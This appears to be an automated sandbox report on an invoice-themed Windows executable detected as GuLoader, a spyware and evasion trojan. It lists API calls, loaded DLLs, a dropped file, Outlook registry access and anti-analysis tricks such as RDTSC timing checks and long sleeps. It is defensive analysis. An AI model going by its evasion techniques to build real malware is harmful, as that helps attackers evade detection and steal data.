Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39210012	3_2_39210012
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39211817	3_2_39211817
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921E870	3_2_3921E870
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921B670	3_2_3921B670
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39210040	3_2_39210040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39219A50	3_2_39219A50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921CC50	3_2_3921CC50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921BCB0	3_2_3921BCB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39218AB0	3_2_39218AB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921EEB0	3_2_3921EEB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39210E8A	3_2_39210E8A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921A090	3_2_3921A090
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921D290	3_2_3921D290
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39210E98	3_2_39210E98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39211CE0	3_2_39211CE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921F4F0	3_2_3921F4F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_392190F0	3_2_392190F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921C2F0	3_2_3921C2F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_392104FA	3_2_392104FA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921D8D0	3_2_3921D8D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3921A6D0	3_2_3921A6D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391B50	3_2_39391B50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39393008	3_2_39393008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391470	3_2_39391470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_393936F0	3_2_393936F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392920	3_2_39392920
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390D88	3_2_39390D88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392238	3_2_39392238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391B3F	3_2_39391B3F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391460	3_2_39391460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_393936E1	3_2_393936E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392911	3_2_39392911
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_393909E1	3_2_393909E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390A10	3_2_39390A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390D7A	3_2_39390D7A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392FFA	3_2_39392FFA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390027	3_2_39390027
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390040	3_2_39390040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392229	3_2_39392229
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_394838D0	3_2_394838D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39489130	3_2_39489130
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39481A20	3_2_39481A20
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39482638	3_2_39482638

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: String function: 00402C41 appears 51 times

Sample file is different than original file name gathered from version info

Source: Factura Honorarios 2024-11-17.exe, 00000000.00000000.1405150029.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000000.1869133233.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683754964.0000000035CC7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe

Uses 32bit PE files

Source: Factura Honorarios 2024-11-17.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_00403359

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Users\user\AppData\Local\Temp\nsk8B7C.tmp

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File read: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF41B63

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_6FF42FD0 push eax; ret	0_2_6FF42FFE
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019CA98 pushfd ; retf 0019h	3_3_0019CA99
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019EE18 push eax; iretd	3_3_0019EE65
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019EE8C push eax; iretd	3_3_0019EEA9
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019CF4C push eax; iretd	3_3_0019CF4D
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00159C30 push esp; retf 0017h	3_2_00159D55

Drops PE files

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll

Jump to dropped file

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API/Special instruction interceptor: Address: 70A64CD
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API/Special instruction interceptor: Address: 3C164CD

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	RDTSC instruction interceptor: First address: 7069CA9 second address: 7069CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682CC511A3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	RDTSC instruction interceptor: First address: 3BD9CA9 second address: 3BD9CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682C69C2F3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 35F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 35CD0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599453	Jump to behavior
